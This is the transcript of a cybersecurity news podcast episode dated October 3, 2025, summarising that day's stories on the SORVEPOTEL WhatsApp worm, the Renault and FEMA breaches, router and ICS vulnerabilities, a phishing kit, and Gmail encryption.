Podcasts
CyberWire Daily
Ep 2406
The CyberWire Daily Podcast 10.3.25
Ep 2406 | 10.3.25

WhatsApp worm spreads.

Show Notes
Transcript

A fast-spreading malware campaign is abusing WhatsApp as both lure and launchpad. Carmaker Renault suffers a data breach. DrayTek patches a critical router flaw. CISA alerts cover a range of vulnerabilities. A new phishing kit lowers the bar for convincing lures. A Catholic hospital network pays $7.6 million to settle data breach litigation. A major breach at FEMA exposes employee data. Google expands Gmail’s end-to-end encryption (E2EE) capabilities. On our Industry Voices segment, we are joined by Brian Vecci, Field CTO at Varonis, discussing move fast but don’t break things: Innovating at light speed without putting data at risk. The UK’s digital ID is a solution in search of a mandate.

Today is Friday October 3rd 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A fast-spreading malware campaign is abusing WhatsApp as both lure and launchpad. 

A fast-spreading malware campaign is abusing WhatsApp as both lure and launchpad. First seen in September 2025 in Brazil, the self-propagating malware known as SORVEPOTEL spreads through phishing messages with malicious ZIP files disguised as receipts or budgets. Once opened, a hidden Windows shortcut triggers encoded PowerShell commands that fetch additional payloads, establish persistence, and connect to attacker-controlled domains. The malware then hijacks active WhatsApp Web sessions, replicating itself automatically to all contacts and groups, rapidly multiplying infections and sometimes leading to account bans. Analysts note that attackers also distribute similar ZIPs via phishing emails appearing to come from trusted institutions. The campaign highlights growing risks from messaging platforms used in enterprise environments, where social engineering can amplify disruption.

Carmaker Renault suffers a data breach. 

The personal data of Renault and Dacia customers in the UK has been compromised after a cyber attack on a third-party data processor used by the carmaker. Renault confirmed the breach in emails to affected drivers, noting that while no financial or password information was exposed, attackers accessed sensitive personal details including names, addresses, birth dates, gender, phone numbers, and vehicle registration data. The company has not disclosed the total number of customers impacted but stressed that its own systems were not directly compromised. Renault says it is contacting those affected and urging caution against unsolicited requests for information. The incident adds to a growing list of major automotive cyber breaches, as Jaguar Land Rover also contends with a separate disruptive attack.

DrayTek patches a critical router flaw. 

DrayTek has released patches for CVE-2025-10547, a critical remote code execution flaw in DrayOS routers. The bug, reported by researcher Pierre-Yves Maes, can be triggered via crafted HTTP or HTTPS requests to the web interface, potentially leading to memory corruption, crashes, or remote code execution. While WAN attacks are blocked if remote WebUI and VPN services are disabled or ACLs configured, local exploitation remains possible. Firmware updates for 35 Vigor models are available, with no evidence yet of active exploitation.

CISA alerts cover a range of vulnerabilities. 

CISA has added a Meteobridge vulnerability, tracked as CVE-2025-4008, to its Known Exploited Vulnerabilities catalog after confirming active attacks. Meteobridge devices connect local weather stations to public networks and are managed through a web interface. The flaw, scored 8.7, stems from unsanitized user input in a CGI script exposed without authentication, allowing command injection and remote code execution. Researchers at Onekey warned in May that exploitation could occur via simple GET requests, with a proof-of-concept publicly available. Roughly 100 devices remain exposed online due to misconfiguration, despite Smartbedded releasing a patch in version 6.2 months earlier. CISA now requires federal agencies to remediate within three weeks under Binding Operational Directive 22-01. The agency has not disclosed the scope of observed exploitation.

Meanwhile, CISA has issued two new ICS advisories covering Raise3D Pro2 Series 3D printers and Hitachi Energy MSM products. The Raise3D flaw, CVE-2025-10653, is an authentication bypass through an unauthenticated debug port, potentially enabling file system access and data exfiltration. Raise3D advises disabling developer mode until a firmware patch is released. Hitachi Energy MSM devices face XSS and assertion vulnerabilities, risking injection or crashes. CISA urges organizations to apply mitigations, restrict internet exposure, and follow defense-in-depth practices.

A new phishing kit lowers the bar for convincing lures. 

A newly advertised phishing kit called Impact Solutions is lowering the bar for cybercrime by giving attackers a point-and-click way to build convincing lures. First observed in September 2025, the tool provides ready-made templates for malware delivery through LNK shortcuts, SVG files, and HTML attachments. It also includes evasive features such as file type masking, UAC bypass techniques, and anti-sandbox checks. With a few clicks, even low-skilled actors can disguise malicious files as PDFs, videos, or invoices and distribute them in phishing campaigns. Impact Solutions also offers modules like fake login pages and a “ClickFix” feature that tricks users into running Base64-encoded PowerShell commands. Abnormal AI warns that commercialized kits like this expand social engineering risks and recommends behavior-based detection tools.

A Catholic hospital network pays $7.6 million to settle data breach litigation. 

Hospital Sisters Health System (HSHS), a Catholic hospital network in the Midwest, will pay $7.6 million and strengthen data security to settle litigation over its 2023 breach affecting nearly 900,000 people. The attack exposed sensitive personal and health information. Under the settlement, class members can claim up to $5,000 for documented losses or opt for smaller pro-rated payments. HSHS denies wrongdoing but agreed to implement security improvements. Legal experts say settlements like this highlight mounting pressure on healthcare providers to bolster cybersecurity.

A major breach at FEMA exposes employee data. 

A major breach at FEMA exposed employee data from both FEMA and U.S. Customs and Border Protection, Nextgov/FCW reports. Hackers exploited compromised credentials and the CitrixBleed 2.0 flaw beginning June 22, exfiltrating data from Region 6 servers covering five states and nearly 70 tribal nations. DHS cited FEMA’s failure to enforce multi-factor authentication and patch critical vulnerabilities, dismissing its IT staff in August. FEMA has since restructured leadership, naming acting CIO Diego Lapiduz and implementing stronger security controls.

Google expands Gmail’s end-to-end encryption (E2EE) capabilities. 

Google is expanding Gmail’s end-to-end encryption (E2EE) capabilities, allowing enterprise users to send encrypted emails to recipients on any platform. Users can enable “Additional encryption” when composing a message, ensuring seamless decryption for Google Workspace subscribers. Non-Gmail recipients instead receive a secure link to view and reply through a guest Workspace account, removing the need for key exchanges or third-party tools. The feature, rolling out over the next two weeks to Enterprise Plus customers with Assured Controls, is powered by client-side encryption (CSE), which keeps encryption keys outside Google’s servers. This design helps organizations meet regulatory requirements for data sovereignty, HIPAA compliance, and export controls by ensuring that even Google cannot access message contents. Google first piloted the approach in 2022 across Workspace services.

The UK’s digital ID is a solution in search of a mandate. 

The UK government has finally put flesh on the bones of its digital ID plan, perhaps hoping to reassure the 2.76 million citizens who’ve already signed a petition demanding it be scrapped. Prime Minister Keir Starmer, who somehow forgot to mention the idea during his election campaign, now says the digital credential will streamline bureaucracy and make right-to-work checks easier. Palantir, often accused of being too cozy with government, has declined to bid—citing its policy of only supporting initiatives with an electoral mandate. The move echoes Estonia’s efficiency drive but arrives under the shadow of Big Brother Watch, which warns of creeping state surveillance. Officials insist it won’t be compulsory, police can’t demand it, and privacy will be respected. Still, skeptics say Starmer must explain why Britons should trust yet another government IT scheme—or risk watching his flagship digital ID wither before it even launches.

Whether it becomes a passport to convenience or just another card nobody asked for, the fate of Britain’s digital ID may hinge less on technology and more on trust.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

One quick note before we wrap up: I’ve been nominated for the SANS Difference Maker Award in the Media Creator of the Year category. I’m honored to be recognized and would appreciate your support. You’ll find the link to vote in our show notes, and voting is open until Wednesday, October 8th at 11:59 p.m. Eastern. Thanks for listening, and for being part of the N2K CyberWire community. 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

N2K’s senior producer is Alice Carruth. Our producer is Liz Stokes. We’re mixed by Elliott Peltzman and Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.

CyberWire Daily
Podcast Info
HOST(S):
Dave Bittner
Dave Bittner is a security podcast host and one of the founders at CyberWire. He's a creator, producer, videographer, actor, experimenter, and entrepreneur. He's had a long career in the worlds of television, journalism and media production, and is one of the pioneers of non-linear editing and digital storytelling.
Schedule: Monday-Friday
Creator: CyberWire, Inc.
ADVERTISEMENT
Sponsored by Varonis
Sponsored by Varonis

Varonis is a leader in data security, fighting a different battle than conventional cybersecurity companies. Varonis’ cloud-native Data Security Platform continuously discovers and classifies critical data, removes exposures, and detects advanced threats with AI-powered automation.